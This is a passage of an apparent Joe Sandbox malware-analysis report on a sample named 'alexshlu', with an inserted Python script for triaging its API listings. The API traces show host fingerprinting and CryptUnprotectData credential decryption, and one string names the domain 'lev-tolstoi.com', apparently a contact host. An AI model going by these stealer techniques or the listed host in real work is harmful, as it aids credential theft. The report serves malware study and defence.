                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E131C2411A8BCB05EFA4D94A6BDB775AF46728F24480AE4116B381DF749E20CFA1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000), ref: 002C99E7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?,?,002C2602,00000000), ref: 002C99F3
                                                                                                                                                                                                                                          • Part of subcall function 002C9A44: CloseHandle.KERNEL32(FFFFFFFE,002C9A03,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?), ref: 002C9A54
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 002C9A03
                                                                                                                                                                                                                                          • Part of subcall function 002C9A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002C99C1,002C8EAC,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A38
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A18
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                        • Opcode ID: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction ID: e35fc91e9444392d0eff6c11106f426f5c0abec80b421251d47aeced970e5a62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F01C36811229BFCF226F91EC0CE893F66FB487A0F104515FE1D95160D6328DA0EB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002AE5D9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002AE5E8
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 002AE5F1
                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002AE5FE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction ID: 2ce6224cc3061221171bd5515d8034012c840288d948b4fd6b76695db0f9873e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF06274D1120DEFCB00DBB4D94999EBBF4FF1C204BA18996E412E7550E730AB449B51
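The four-call entry above (GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter) is the sequence the MSVC CRT's __security_init_cookie uses to seed the /GS stack cookie, and the entries whose calls carry the LIBCMT, LIBCPMT or LIBVCRUNTIME module label are statically linked runtime code; neither is behaviour specific to this sample. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries written in the report's "APIs" format and tags those two idioms so the untagged functions can be reviewed first. The embedded SAMPLE is a constructed subset of the entries shown above with argument lists shortened, and the module list, tag names and the report line format it assumes are the example's own.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.

Added example (not Joe Sandbox code): parse the report's function entries and tag
the ones that match known MSVC CRT idioms so the analyst can skip library code.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    name: str          # API or CRT routine name, e.g. "GetCurrentThreadId"
    module: str        # module label as printed by the report, e.g. "KERNEL32", "LIBCMT"
    ref: str           # call-site address inside the dump, e.g. "002AE5E8"
    subcall: str = ""  # parent function when listed as "Part of subcall function"


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    tags: list = field(default_factory=list)

    def api_names(self) -> set:
        return {a.name for a in self.apis}


# One API line: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function ADDR:" (format assumed from the report).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)(?:\(.*\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API String ID|API ID|String ID):\s*(?P<val>.*?)\s*$")

# Assumption: these module labels mark statically linked runtime code in the report.
CRT_MODULES = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}
# The four calls the MSVC CRT makes in __security_init_cookie to seed the /GS cookie.
COOKIE_INIT = {"GetSystemTimeAsFileTime", "GetCurrentThreadId",
               "GetCurrentProcessId", "QueryPerformanceCounter"}


def parse_entries(text: str) -> list:
    """Split report text into one FunctionEntry per "APIs" block."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m["key"], m["val"]
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.string_id = val
            else:
                cur.api_string_id = val
    return entries


def classify(entry: FunctionEntry) -> list:
    """Tag an entry with the CRT idioms it matches; an empty list means 'review by hand'."""
    tags = []
    if COOKIE_INIT <= entry.api_names():
        tags.append("crt:__security_init_cookie")
    if any(a.module in CRT_MODULES for a in entry.apis):
        tags.append("crt:statically-linked-runtime")
    return tags


def triage(text: str) -> list:
    entries = parse_entries(text)
    for e in entries:
        e.tags = classify(e)
    return entries


def needs_review(entries: list) -> list:
    """Entries that matched no library idiom: the ones worth an analyst's time."""
    return [e for e in entries if not e.tags]


# Constructed sample: a subset of the report's entries with argument lists shortened.
SAMPLE = """\
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 002AE5D9
• GetCurrentThreadId.KERNEL32 ref: 002AE5E8
• GetCurrentProcessId.KERNEL32 ref: 002AE5F1
• QueryPerformanceCounter.KERNEL32(?), ref: 002AE5FE
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 002C99E7
• GetLastError.KERNEL32(?,002C8EBF,00000000,00000001), ref: 002C99F3
  • Part of subcall function 002C9A44: CloseHandle.KERNEL32(FFFFFFFE,002C9A03), ref: 002C9A54
• ___initconout.LIBCMT ref: 002C9A03
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• API String ID: 2744216297-0
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 002BA375
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
"""

if __name__ == "__main__":
    for e in triage(SAMPLE):
        print(f"{e.api_id:60s} {e.tags or 'REVIEW'}")
```

Run against the full report text, the script leaves the EncodePointer entry (and any other function that matches no idiom) in the review list while the cookie-seeding and LIBCMT/LIBCPMT entries drop out; extend CRT_MODULES or add further rules in classify as more runtime idioms are confirmed in the dump.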
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002BA251,?,?,00000000,00000000,00000000,?), ref: 002BA375
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 4179731ae84908fa24cbb74cc4dee311ab8e37a358e494282f54e612c91d1cd7
• Instruction ID: 3fce51ac08676d8b331f2fe1afcf819fd9583961faab45f24444090a38eb7f15
• Opcode Fuzzy Hash: 4179731ae84908fa24cbb74cc4dee311ab8e37a358e494282f54e612c91d1cd7
• Instruction Fuzzy Hash: 6F41883191020AEFCF15DF98CC85AEEBBB6BF08340F148099F90567221D375AA61DF52
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 002B9E33
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 52c3b9c73bea181a9b13339cf9fca6cfe48e77e6a8da1a36e0509a2382428b8c
                                                                                                                                                                                                                                        • Instruction ID: 11c25cb41012ab17e458cb0874ad5cd2a7c98e95c424e9941fe9e469cede6107
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52c3b9c73bea181a9b13339cf9fca6cfe48e77e6a8da1a36e0509a2382428b8c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431943282021A9BCF268F54C8449FA7BA9FF093A5B14815AFA9499121C377DCF1DB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: GetctypeLockitLockit::_std::_
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 2423992667-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 67081ef2ddd15b70f883adcce10d066f94efc01b0b5649a8d70536f5449f04bd
                                                                                                                                                                                                                                        • Instruction ID: 443adecab8155a0d4194ba72d749553157e6a29570b1cf1e5f95b2f412795fa0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67081ef2ddd15b70f883adcce10d066f94efc01b0b5649a8d70536f5449f04bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2631F5B19187848BE310DF29C85531BBBE4AFE5308F04491CF5884B242EB75E5A8CBD3

Execution Graph

Execution Coverage: 5.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 42.9%
Total number of Nodes: 247
Total number of Limit Nodes: 22
[Execution graph: rendered node/edge listing omitted. API calls appearing in the graph: CoSetProxyBlanket, LdrInitializeThunk, RtlAllocateHeap, RtlFreeHeap, RtlReAllocateHeap, CoCreateInstance, SysAllocString, SysFreeString, GetVolumeInformationW, VariantInit, VariantClear, GetPhysicallyInstalledSystemMemory, GetComputerNameExA, GetUserDefaultUILanguage, GetForegroundWindow, CoInitializeSecurity, CoInitializeEx, CoUninitialize, ExitProcess, GetCurrentProcessId, GetCurrentThreadId, GetSystemMetrics, GetLogicalDrives, CryptUnprotectData]

Control-flow Graph

[Control-flow graph (executed / not executed blocks): rendered block listing omitted. Blocks: 431bb0-431c9c (GetSystemMetrics * 2) -> 431ca3-432087]
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: MetricsSystem
• String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
• API String ID: 4116985748-628680385
• Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
• Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
• Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
• Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86

Control-flow Graph

[Control-flow graph (executed / not executed blocks): rendered block/edge listing omitted. Basic blocks span 436f90-4376ae; API calls in the graph: CoCreateInstance, GetVolumeInformationW, SysAllocString, SysFreeString, CoSetProxyBlanket, VariantInit, VariantClear; internal calls to 43ce00, 41dc20, 408070, 407ff0, 408e90, 408020, 408000]
APIs
• CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
• SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
• SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
• SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
• VariantInit.OLEAUT32(.'()), ref: 00437385
• VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                        • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                                                                                                                                                                        • API String ID: 2573436264-264043890
                                                                                                                                                                                                                                        • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                        • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 226 40e3e5-40e3e6 223->226 227 40e3fb-40e405 223->227 225 40e3d0-40e3d9 224->225 225->223 225->225 228 40e3f0-40e3f9 226->228 229 40e407-40e40b 227->229 230 40e41b-40e423 227->230 228->227 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 241 40e5c0-40e5d8 238->241 240 40e470-40e47d 239->240 240->240 243 40e47f 240->243 241->241 242 40e5da-40e5fb 241->242 244 40e600-40e628 242->244 243->238 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 258 40e785-40e786 256->258 259 40e79b-40e7a5 256->259 260 40e770-40e779 257->260 261 40e790-40e799 258->261 262 40e7a7-40e7ab 259->262 263 40e7bb-40e7c3 259->263 260->256 260->260 261->259 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 273 40e950-40e96a 271->273 274 40e810-40e81d 272->274 273->273 275 40e96c-40e98f 273->275 274->274 276 40e81f 274->276 277 40e990-40e9b9 275->277 276->271 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: Uninitialize
• String ID: "# `$,$I~$`~$lev-tolstoi.com$qx$s
• API String ID: 3861434553-2978658354
• Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
• Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
• Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
• Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 301 423626 287->301 302 42361f-423624 287->302 288->287 289->295 299 4234f7-4234fc 291->299 300 4234fe 291->300 297 423880-42389c 292->297 294->293 295->290 303 423497-42349c 296->303 304 42349e 296->304 297->297 307 42389e-4238ae call 4215f0 297->307 309 423500-423537 call 407ff0 299->309 300->309 305 42362d-4236d9 call 407ff0 301->305 302->305 306 4234a1-4234bf call 407ff0 303->306 304->306 319 4236e0-423724 305->319 306->287 306->288 306->289 306->290 306->291 306->292 306->293 306->294 306->295 317 4238b3-4238b6 307->317 318 423540-423585 309->318 323 4238be-4238db 317->323 318->318 320 423587-42358f 318->320 319->319 321 423726-42372e 319->321 324 4235b1-4235bd 320->324 325 423591-423596 320->325 326 423730-423737 321->326 327 423751-423761 321->327 328 4238e0-423904 323->328 330 4235e1-4235ec call 43d6c0 324->330 331 4235bf-4235c3 324->331 329 4235a0-4235af 325->329 332 423740-42374f 326->332 333 423763-423767 327->333 334 423781-4237a1 GetLogicalDrives call 43d6c0 327->334 328->328 335 423906-423989 328->335 329->324 329->329 342 4235f1-4235f9 330->342 337 4235d0-4235df 331->337 332->327 332->332 339 423770-42377f 333->339 334->290 334->293 334->294 334->295 334->323 345 4237c0-4237c6 call 408000 334->345 346 4239f1-4239f7 call 408000 334->346 347 4239eb 334->347 348 4237cf 334->348 336 423990-4239be 335->336 336->336 341 4239c0-4239e3 call 421270 336->341 337->330 337->337 339->334 339->339 341->347 342->287 342->288 342->292 342->293 342->294 342->323 342->345 345->348 347->346 348->292
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: #R,T$$^<P$VW$]~"p$ij$KM
• API String ID: 0-788320361
• Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
• Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
• Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
• Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 354 42bfda-42c03f call 43ce00 358 42c040-42c06c 354->358 358->358 359 42c06e-42c078 358->359 360 42c07a-42c083 359->360 361 42c09d 359->361 363 42c090-42c099 360->363 362 42c09f-42c0ac 361->362 364 42c0cb-42c13a call 43ce00 GetComputerNameExA 362->364 365 42c0ae-42c0b5 362->365 363->363 366 42c09b 363->366 371 42c140-42c167 364->371 367 42c0c0-42c0c9 365->367 366->362 367->364 367->367 371->371 372 42c169-42c173 371->372 373 42c175-42c17f 372->373 374 42c18d 372->374 376 42c180-42c189 373->376 375 42c18f-42c19c 374->375 378 42c1bb-42c20f GetComputerNameExA 375->378 379 42c19e-42c1a5 375->379 376->376 377 42c18b 376->377 377->375 381 42c210-42c252 378->381 380 42c1b0-42c1b9 379->380 380->378 380->380 381->381 382 42c254-42c25e 381->382 383 42c260-42c267 382->383 384 42c27b-42c288 382->384 385 42c270-42c279 383->385 386 42c28a-42c291 384->386 387 42c2ab-42c2ff 384->387 385->384 385->385 388 42c2a0-42c2a9 386->388 390 42c300-42c324 387->390 388->387 388->388 390->390 391 42c326-42c330 390->391 392 42c332-42c339 391->392 393 42c34b-42c358 391->393 394 42c340-42c349 392->394 395 42c35a-42c361 393->395 396 42c37b-42c3d6 call 43ce00 393->396 394->393 394->394 397 42c370-42c379 395->397 401 42c3e0-42c3fa 396->401 397->396 397->397 401->401 402 42c3fc-42c406 401->402 403 42c41b-42c42f 402->403 404 42c408-42c40f 402->404 405 42c572-42c5b1 403->405 406 42c435-42c43c 403->406 407 42c410-42c419 404->407 409 42c5c0-42c5e7 405->409 408 42c440-42c44a 406->408 407->403 407->407 410 42c460-42c466 408->410 411 42c44c-42c451 408->411 409->409 412 42c5e9-42c5fb 409->412 414 42c490-42c49e 410->414 415 42c468-42c46b 410->415 413 42c510-42c516 411->413 416 42c61b-42c61e call 430520 412->416 417 42c5fd-42c604 412->417 423 42c518-42c51e 413->423 420 42c4a4-42c4a7 414->420 421 42c52a-42c533 414->421 415->414 418 42c46d-42c483 415->418 425 42c623-42c643 416->425 419 42c610-42c619 417->419 418->413 419->416 419->419 420->421 424 42c4ad-42c50e 420->424 427 42c535-42c537 421->427 428 42c539-42c53c 421->428 423->405 426 42c520-42c522 423->426 424->413 426->408 431 42c528 426->431 427->423 429 42c56e-42c570 428->429 430 42c53e-42c56c 428->430 429->413 430->413 431->405
APIs
• FreeLibrary.KERNEL32(?), ref: 0042C0D7
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: ComputerName$FreeLibrary
• String ID: x$Wu
• API String ID: 2243422189-1677337568
• Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
• Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
• Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
